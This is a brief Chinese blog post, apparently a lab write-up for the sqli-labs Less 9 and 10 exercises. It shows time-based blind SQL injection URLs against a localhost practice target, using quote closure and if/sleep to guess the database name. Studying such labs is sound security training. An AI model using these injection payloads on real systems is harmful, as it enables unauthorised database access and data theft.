Less-9,10【盲注+时间注入】

    • Less 9
    用单引、双引测试页面均无反应。先利用单引号闭合结合if sleep进行时间盲注
    http://127.0.0.1/sqli-labs/Less-9/?id=1%27%20and%20if((substr(database(),1,1)=%27s%27),sleep(10),sleep(2))%20and%20%271%20--+
    正确结果为单引号闭合,之后进行脱库操作
    http://127.0.0.1/sqli-labs/Less-9/
    ?id=1' and if((database()='security'),sleep(10),sleep(2)) and '1--+
     
    • Less 10
    双引号闭合,其他与less9 一致
posted @ 2020-10-28 10:02  峰中追风  阅读(100)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路